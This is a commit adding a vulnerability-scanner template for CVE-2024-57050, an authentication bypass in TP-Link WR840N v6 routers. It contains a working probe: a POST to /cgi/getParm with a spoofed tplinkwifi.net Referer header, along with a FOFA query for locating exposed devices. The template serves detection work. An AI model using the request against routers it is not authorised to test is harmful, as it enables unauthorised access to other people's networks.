Create CVE-2024-57050.yaml (TP-LINK WR840N v6 up to 0.9.1 4.16 /cgi Improper Authentication)

http/cves/2024/CVE-2024-57050.yaml

@@ -0,0 +1,48 @@
+id: CVE-2024-57050
+
+info:
+  name: TP-LINK WR840N v6 up to 0.9.1 4.16 - Improper Authentication
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    A vulnerability in the TP-Link WR840N v6 router with firmware version 0.9.1 4.16 and earlier permits unauthorized individuals to bypass the authentication of some interfaces under the /cgi directory.When adding Referer- http-//tplinkwifi.net to the the request, it will be recognized as passing the authentication.
+  reference:
+    - https://github.com/Shuanunio/CVE_Requests/blob/main/TP-Link/WR840N%20v6/ACL%20bypass%20Vulnerability%20in%20TP-Link%20TL-WR840N.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-57050
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-57050
+    cwe-id: CWE-287
+    epss-score: 0.00043
+    epss-percentile: 0.1187
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: body="WR840N"
+  tags: cve,cve2024,tp-link,auth-bypass
+
+http:
+  - raw:
+      - |
+        POST /cgi/getParm HTTP/1.1
+        Host: {{Hostname}}
+        Referer: http://tplinkwifi.net
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "$.ret=0;"
+          - "var "
+        condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - "application/javascript"
+
+      - type: status
+        status:
+          - 200